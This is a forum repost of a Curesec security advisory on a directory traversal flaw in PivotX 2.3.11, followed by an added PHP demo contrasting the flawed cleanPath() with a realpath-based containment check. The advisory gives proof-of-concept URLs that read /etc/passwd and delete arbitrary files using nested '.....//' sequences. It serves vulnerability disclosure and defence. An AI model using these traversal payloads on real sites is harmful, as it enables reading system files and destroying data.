PivotX 2.3.11 - Directory Traversal (2016)
Topic: PivotX 2.3.11 - Directory Traversal (2016) - 01.04.2016, 13:45
Post: #1
Code:
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    PivotX 2.3.11
Fixed in:            not fixed
Fixed Version Link:  n/a
Vendor Website:      http://pivotx.net/
Vulnerability Type:  Directory Traversal
Remote Exploitable:  Yes
Reported to vendor:  01/20/2016
Disclosed to public: 03/15/2016
Release mode:        Full Disclosure
CVE:                 n/a
Credits              Tim Coen of Curesec GmbH

2. Overview

PivotX is a CMS for blogging written in PHP. In version 2.3.11, it is
vulnerable to Directory Traversal, allowing authenticated users to read and
delete files outside of the PivotX directory.

3. Details

Description

CVSS: Medium 4.0 AV:N/AC:L/Au:S/C:P/I:N/A:N

The function cleanPath which is responsible for sanitizing path names can be
bypassed by an attacker, leading to directory traversal in multiple places.

Proof of Concept

Admins and Superadmins can read any file:

http://localhost/pivotx_latest/pivotx/ajaxhelper.php?function=view&basedir=
L3Zhci93d3cvcGl2b3R4X2xhdGVzdC9CYXNlZGlyLwo=&file=../.....//...//.....//.../
/.....//...//.....//...//.....//...//.....//...//etc/passwd

Advanced users, Admins and Superadmins can delete any file, possibly leading to
DOS:

http://localhost/pivotx_latest/pivotx/index.php?page=media&del=.....//.../
/.....//...//.....//...//.....//...//.....//...//.....//...//important/
important.file&pivotxsession=ovyyn4ob2jc5ym92

Code

lib.php
function cleanPath($path) {
    $path = str_replace('../', '', $path);
    $path = str_replace('..\\', '', $path);
    $path = str_replace('..'.DIRECTORY_SEPARATOR, '', $path);
    return $path;
}

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

01/20/2016 Informed Vendor about Issue
01/29/2016 Vendor replies, PivotX is not maintained anymore
03/15/2016 Disclosed to public

Blog Reference:
https://blog.curesec.com/article/blog/PivotX-2311-Directory-Traversal-154.html
--


blog:  https://blog.curesec.com
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Romain-Rolland-Str 14-24
13089 Berlin, Germany
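
Added example, not part of the Curesec advisory or of PivotX: it runs the advisory's cleanPath() next to a containment check, to show why single-pass removal of "../" leaves a traversal sequence behind while resolving the path and comparing it to the base directory does not. The function resolveInside() and the temporary sandbox files are hypothetical names constructed for this illustration; a POSIX path separator is assumed.

```php
<?php
// cleanPath() is copied from the advisory; everything else is added illustration.
function cleanPath($path) {
    $path = str_replace('../', '', $path);
    $path = str_replace('..\\', '', $path);
    $path = str_replace('..'.DIRECTORY_SEPARATOR, '', $path);
    return $path;
}

// Hypothetical replacement: canonicalise first, then require the result to stay under $baseDir.
function resolveInside(string $baseDir, string $userPath): ?string {
    $base = realpath($baseDir);
    if ($base === false) { return null; }
    // realpath() collapses "..", "." and symlinks; it returns false if the file does not exist.
    $target = realpath($base . DIRECTORY_SEPARATOR . $userPath);
    if ($target === false) { return null; }
    // Compare against the base plus a trailing separator so "/x/base2" cannot match "/x/base".
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strncmp($target, $prefix, strlen($prefix)) === 0 ? $target : null;
}

// Constructed sandbox: <tmp>/cleanpath_demo_<pid>/base/inside.txt and .../outside.txt
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'cleanpath_demo_' . getmypid();
$base = $root . DIRECTORY_SEPARATOR . 'base';
mkdir($base, 0700, true);
file_put_contents($base . DIRECTORY_SEPARATOR . 'inside.txt', 'ok');
file_put_contents($root . DIRECTORY_SEPARATOR . 'outside.txt', 'constructed sample');

// One benign name, one plain traversal, and the nested pattern used in the advisory's URLs.
foreach (['inside.txt', '../outside.txt', '.....//...//outside.txt'] as $in) {
    $cleaned = cleanPath($in);
    printf("%-26s cleanPath=%-16s still-traverses=%-3s resolveInside=%s\n",
        $in, $cleaned,
        strpos($cleaned, '..') !== false ? 'yes' : 'no',
        resolveInside($base, $in) === null ? 'rejected' : 'allowed');
}

// Remove the constructed files again.
unlink($base . DIRECTORY_SEPARATOR . 'inside.txt');
unlink($root . DIRECTORY_SEPARATOR . 'outside.txt');
rmdir($base);
rmdir($root);
```

Because realpath() needs the target to exist, this check suits read and delete operations like the two in the advisory; a path for a file that is yet to be created needs its parent directory resolved instead.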